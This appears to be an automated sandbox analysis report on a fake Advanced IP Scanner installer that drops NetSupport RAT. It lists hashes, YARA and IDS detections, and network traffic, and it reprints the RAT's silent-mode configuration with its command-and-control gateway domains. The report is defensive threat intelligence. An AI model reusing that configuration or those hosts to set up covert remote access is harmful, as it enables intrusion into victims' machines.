Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.\|.....................Rich............PE..L.....3V...........!.................^.......................................08.......7.....................................t........ ..P............x7.......6.........................................@...................8x..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................t..............@....hhshare.............v..............@....rsrc...P.... .......x..............@..@.reloc...,....6......J5.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	459760
Entropy (8bit):	6.678291257338415
Encrypted:	false
SSDEEP:	12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
MD5:	69F72AD2DAD99FF0FBC7F2C671523014
SHA1:	8AAAB0955014B89CA794A51DD527D3AFE6F38A94
SHA-256:	23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
SHA-512:	EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~..L~..L~..L..pLi..L~..L..Lw.}Ls..L..DL..L..EL6..L..uL...L..tL...L..sL...LRich~..L................PE..L....J.`...........!.....>...r......n7.......P...............................P......1.....@..........................Q..m....D..........@................O.......I...R..............................P&..@............P...............................text...l=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....`.......H..............@....rsrc...@............`..............@..@.reloc...J.......L...h..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	121304
Entropy (8bit):	6.150456878585649
Encrypted:	false
SSDEEP:	768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
MD5:	4F2D0F4A5BA798FA9E85379C7C4BD36E
SHA1:	E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
SHA-256:	AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
SHA-512:	4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L...m1.Q............................ ........ ....@..........................................................................0..<....@..pu..........H................ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc...pu...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\client32.ini

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	638
Entropy (8bit):	5.396410176198281
Encrypted:	false
SSDEEP:	12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
MD5:	74BEF725496CD35EEB6F6B94E1EDDDFD
SHA1:	616AB761A1429E982062009B5C319F796A60BA1B
SHA-256:	8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
SHA-512:	C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
Malicious:	false
Preview:	0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..

C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\nskbfltr.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\Users\user\AppData\Roaming\SysHelper\nsm_vpro.ini

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.532048032699691
Encrypted:	false
SSDEEP:	3:lsylULyJGI6csM:+ocyJGIPsM
MD5:	3BE27483FDCDBF9EBAE93234785235E3
SHA1:	360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:	4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:	EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:	false
Preview:	[COMMON]..Storage_Enabled=0..Debug_Level=0....

C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.737780491933496
Encrypted:	false
SSDEEP:	768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
MD5:	DCDE2248D19C778A41AA165866DD52D0
SHA1:	7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:	9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:	C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	72584
Entropy (8bit):	6.671736046146569
Encrypted:	false
SSDEEP:	1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
MD5:	2A2FC166269EFE48D61CB1AB92215DC2
SHA1:	A5679174D941919BAF764F94640994C01D695625
SHA-256:	73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
SHA-512:	13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.\|."...Rich#...........PE..L......^.....................J.......!............@.......................... ............@....................................<.......T................K..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\init_temp.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	2275903
Entropy (8bit):	7.997003172118591
Encrypted:	true
SSDEEP:	49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
MD5:	C56A7DCC8C1658FA154501AC0819BA7E
SHA1:	DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
SHA-256:	D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
SHA-512:	AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
Malicious:	false
Preview:	PK.........0.6........H..... .nskbfltr.infUT...t..F...gt..Fux.............U....@......A<n..<IO+.(Eh...E.NF...dF.o..Z...B......p...3RlRBU....W..$....4l.. .!...QY. ^..m.%......SL......9.w.R.tv....%.}..j..)...........0..F......V1.B6..y.WU...$..M....B1;~...&.)~...I....?.g.._..R..PK.........H...PK...........W.............. .NSM.LICUT...l}.dl}.dl}.dux.............-..NB1...........]..(7..C...%,.n.....3....6_Sm.......w^..'...=......e.x.f+$dW. .I.=.{y#.\|.....C.....tL.q.....hL>Q...D.j..8..W+ ..5\.....v.\|^...../7...X.V...b...9...X@A.....f.:....Fx.@..7.......U.~.PK....k%........PK........S..<.............. .nsm_vpro.iniUT...n:.K...gn:.Kux..............v.........../JLO.w.KL.IM.5..rIMM..I-K..qy..PK..I...-.......PK........bo.H........x..... .pcicapi.dllUT...x. W...gx. Wux...............\SG.8\|.a@ (.D..E1...$,B.[.@.\A.`@..D..1F.K..P...m.u_*.hk....Z..j...TQ.\|..MX.>.............3s.....7....bQ..d.Q.......5@r.....}........2.........~ZJnn........\~...?'/].....k.q....{.Us.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.992825732698486
TrID:	Win32 Executable (generic) a (10002005/4) 98.45% Inno Setup installer (109748/4) 1.08% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	Advanced_IP_Scanner_2.5.4594.12.exe
File size:	21'426'168 bytes
MD5:	446c29d515104b6752c1e9da981d4e5e
SHA1:	d52760df6b22805a4470a6b2e72654ce36577f30
SHA256:	7b13496fb45b51e821771d63bbd1d503f07710f676481ff34962b051283d8033
SHA512:	c1ad4560b055f630fae3487f0914e8b486d985edc4cf987649e190e1f36fc2ca47044ba94822add92245886a8048890fdda8263651d58a34d6ca0e85a3a73804
SSDEEP:	393216:fTjU2t/X9E3JMUNccjPql0NbgVunl22V5v+w4lWKjEGZuv5:bjU2p9EZvNdjP6Kbaunldv+w4As7Zux
TLSH:	71273363B687A43EF09E0B3B1672B25444FBAA116823AE1785F494BCCF250501E7F75B
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	af4f59b4f071970c

Static PE Info

General

Entrypoint:	0x4a83bc
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	40ab50289f7ef5fae60801f88d4541fc

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	26/09/2024 07:47:26 27/09/2025 07:47:26
Subject Chain	E=makedasalzbergneu79@gmail.com, CN=OMICARE JOINT STOCK COMPANY, O=OMICARE JOINT STOCK COMPANY, L=Ha Noi, S=Ha Noi, C=VN, OID.1.3.6.1.4.1.311.60.2.1.2=Ha Noi, OID.1.3.6.1.4.1.311.60.2.1.3=VN, SERIALNUMBER=0108523661, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	92142F58BB541C3BD5CD828C76AE0FC4
Thumbprint SHA-1:	56FC98490B4845072947536B9E0AC121A37744E6
Thumbprint SHA-256:	CF7A5967658B1BDB4A50A13D22EF734C707876B01D8D4B1F94FA493C5D4F3F57
Serial:	7F07AA1BB8A3B0183893B1AA

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007F4130DA3605h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007F4130E34F8Bh
call 00007F4130E34ADEh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F4130E2F7B8h
mov edx, dword ptr [ebp-14h]
mov eax, 004B41F4h
call 00007F4130D9D6B3h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B41F4h]
mov dl, 01h
mov eax, dword ptr [0049CD14h]
call 00007F4130E30AE3h
mov dword ptr [004B41F8h], eax
xor edx, edx
push ebp
push 004A8A27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F4130E35013h
mov dword ptr [004B4200h], eax
mov eax, dword ptr [004B4200h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F4130E3BCFAh
mov eax, dword ptr [004B4200h]
mov edx, 00000028h
call 00007F4130E313D8h
mov edx, dword ptr [004B4200h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7000	0x71	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5000	0xfec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x992c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x146c6b8	0x2940
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0x10fa8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb52d4	0x25c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb6000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa568c	0xa5800	b889d302f6fc48a904de33d8d947ae80	False	0.3620185045317221	data	6.377190161826806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1b64	0x1c00	588dd0a8ab499300d3701cbd11b017d9	False	0.548828125	data	6.109264411030635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x3838	0x3a00	5c0c76e77aef52ebc6702430837ccb6e	False	0.35338092672413796	data	4.95916338709992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x7258	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb5000	0xfec	0x1000	627340dff539ef99048969aa4824fb2d	False	0.380615234375	data	5.020404933181373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb6000	0x1a4	0x200	fd11c1109737963cc6cb7258063abfd6	False	0.34765625	data	2.729290535217263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb7000	0x71	0x200	7de8ca0c7a61668a728fd3a88dc0942d	False	0.1796875	data	1.305578535725827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb8000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb9000	0x5d	0x200	d84006640084dc9f74a07c2ff9c7d656	False	0.189453125	data	1.3892750148744617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0x10fa8	0x11000	a85fda2741bd9417695daa5fc5a9d7a5	False	0.5789579503676471	data	6.709466460182023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x992c	0x9a00	89075e5f11da974cacd24bc703f451d6	False	0.34600750811688313	data	5.199005877288098	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcb5b8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5472972972972973
RT_ICON	0xcb6e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.34104046242774566
RT_ICON	0xcbc48	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.396505376344086
RT_ICON	0xcbf30	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.5401624548736462
RT_ICON	0xcc7d8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.2475609756097561
RT_ICON	0xcce40	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.42510660980810233
RT_ICON	0xcdce8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5310283687943262
RT_ICON	0xce150	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5316604127579737
RT_ICON	0xcf1f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.3271784232365145
RT_STRING	0xd17a0	0x3f8	data			0.3198818897637795
RT_STRING	0xd1b98	0x2dc	data			0.36475409836065575
RT_STRING	0xd1e74	0x430	data			0.40578358208955223
RT_STRING	0xd22a4	0x44c	data			0.38636363636363635
RT_STRING	0xd26f0	0x2d4	data			0.39226519337016574
RT_STRING	0xd29c4	0xb8	data			0.6467391304347826
RT_STRING	0xd2a7c	0x9c	data			0.6410256410256411
RT_STRING	0xd2b18	0x374	data			0.4230769230769231
RT_STRING	0xd2e8c	0x398	data			0.3358695652173913
RT_STRING	0xd3224	0x368	data			0.3795871559633027
RT_STRING	0xd358c	0x2a4	data			0.4275147928994083
RT_RCDATA	0xd3830	0x10	data			1.5
RT_RCDATA	0xd3840	0x310	data			0.6173469387755102
RT_RCDATA	0xd3b50	0x2c	data			1.2045454545454546
RT_GROUP_ICON	0xd3b7c	0x84	data	English	United States	0.6666666666666666
RT_VERSION	0xd3c00	0x584	data	English	United States	0.29036827195467424
RT_MANIFEST	0xd4184	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x40fc10
dbkFCallWrapperAddr	1	0x4b063c

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T18:48:11.290472+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.4	49741	199.188.200.195	443	TCP
2024-10-31T18:48:11.290472+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.4	49740	151.236.16.15	443	TCP
2024-10-31T18:48:28.742313+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.4	49739	TCP
2024-10-31T18:49:07.603436+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.4	49760	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 18:48:37.130482912 CET	49740	443	192.168.2.4	151.236.16.15
Oct 31, 2024 18:48:37.130539894 CET	443	49740	151.236.16.15	192.168.2.4
Oct 31, 2024 18:48:37.130619049 CET	49740	443	192.168.2.4	151.236.16.15
Oct 31, 2024 18:48:37.212421894 CET	49740	443	192.168.2.4	151.236.16.15
Oct 31, 2024 18:48:37.212456942 CET	443	49740	151.236.16.15	192.168.2.4
Oct 31, 2024 18:48:37.212547064 CET	443	49740	151.236.16.15	192.168.2.4
Oct 31, 2024 18:48:37.253653049 CET	49741	443	192.168.2.4	199.188.200.195
Oct 31, 2024 18:48:37.253700972 CET	443	49741	199.188.200.195	192.168.2.4
Oct 31, 2024 18:48:37.253768921 CET	49741	443	192.168.2.4	199.188.200.195
Oct 31, 2024 18:48:37.256474018 CET	49742	80	192.168.2.4	104.26.1.231
Oct 31, 2024 18:48:37.261689901 CET	80	49742	104.26.1.231	192.168.2.4
Oct 31, 2024 18:48:37.261766911 CET	49742	80	192.168.2.4	104.26.1.231
Oct 31, 2024 18:48:37.261919975 CET	49742	80	192.168.2.4	104.26.1.231
Oct 31, 2024 18:48:37.266823053 CET	80	49742	104.26.1.231	192.168.2.4
Oct 31, 2024 18:48:37.462333918 CET	49741	443	192.168.2.4	199.188.200.195
Oct 31, 2024 18:48:37.462361097 CET	443	49741	199.188.200.195	192.168.2.4
Oct 31, 2024 18:48:37.462445021 CET	443	49741	199.188.200.195	192.168.2.4
Oct 31, 2024 18:48:38.257103920 CET	80	49742	104.26.1.231	192.168.2.4
Oct 31, 2024 18:48:38.257194042 CET	49742	80	192.168.2.4	104.26.1.231
Oct 31, 2024 18:50:27.166564941 CET	49742	80	192.168.2.4	104.26.1.231
Oct 31, 2024 18:50:27.172672033 CET	80	49742	104.26.1.231	192.168.2.4
